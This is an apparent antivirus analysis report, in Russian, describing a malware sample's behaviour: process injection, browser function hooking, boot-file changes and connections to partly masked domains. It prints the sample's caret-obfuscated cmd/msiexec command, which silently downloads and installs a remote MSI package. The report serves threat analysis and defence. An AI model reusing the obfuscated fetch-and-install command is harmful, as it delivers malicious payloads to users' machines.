Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/klo009821.msi /qn
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
следующие пользовательские процессы:
- firefox.exe
Перехватывает функции
в браузерах
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\syswow64\autofmt.exe
- %WINDIR%\syswow64\autochk.exe
Изменения в файловой системе
Создает следующие файлы
- %BOOT_VOL%\boot\bcd.log
- %BOOT_VOL%\boot\bcd
- %TEMP%\nsi36d9.tmp
- %TEMP%\12let2fiul
- %TEMP%\tczbv596pxuq5qz
- %TEMP%\nss3718.tmp\egqunmsyws.dll
Удаляет следующие файлы
- %WINDIR%\installer\msi363f.tmp
Изменяет следующие файлы
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat.log1
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat
Сетевая активность
Подключается к
- 'fa###finn.com':80
- 'ar####iklounge.com':80
- 'su##.com':80
UDP
- DNS ASK fa###finn.com
- DNS ASK fb####sbvsjbvjs.com
- DNS ASK ar####iklounge.com
- DNS ASK ti####endstique.com
- DNS ASK su##.com
- DNS ASK pr#####partner-ag.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msi363f.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/klo009821.msi /qn' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\msiexec.exe' /i http://fa###finn.com/admin/klo009821.msi /qn
- '%WINDIR%\syswow64\control.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSI363F.tmp"
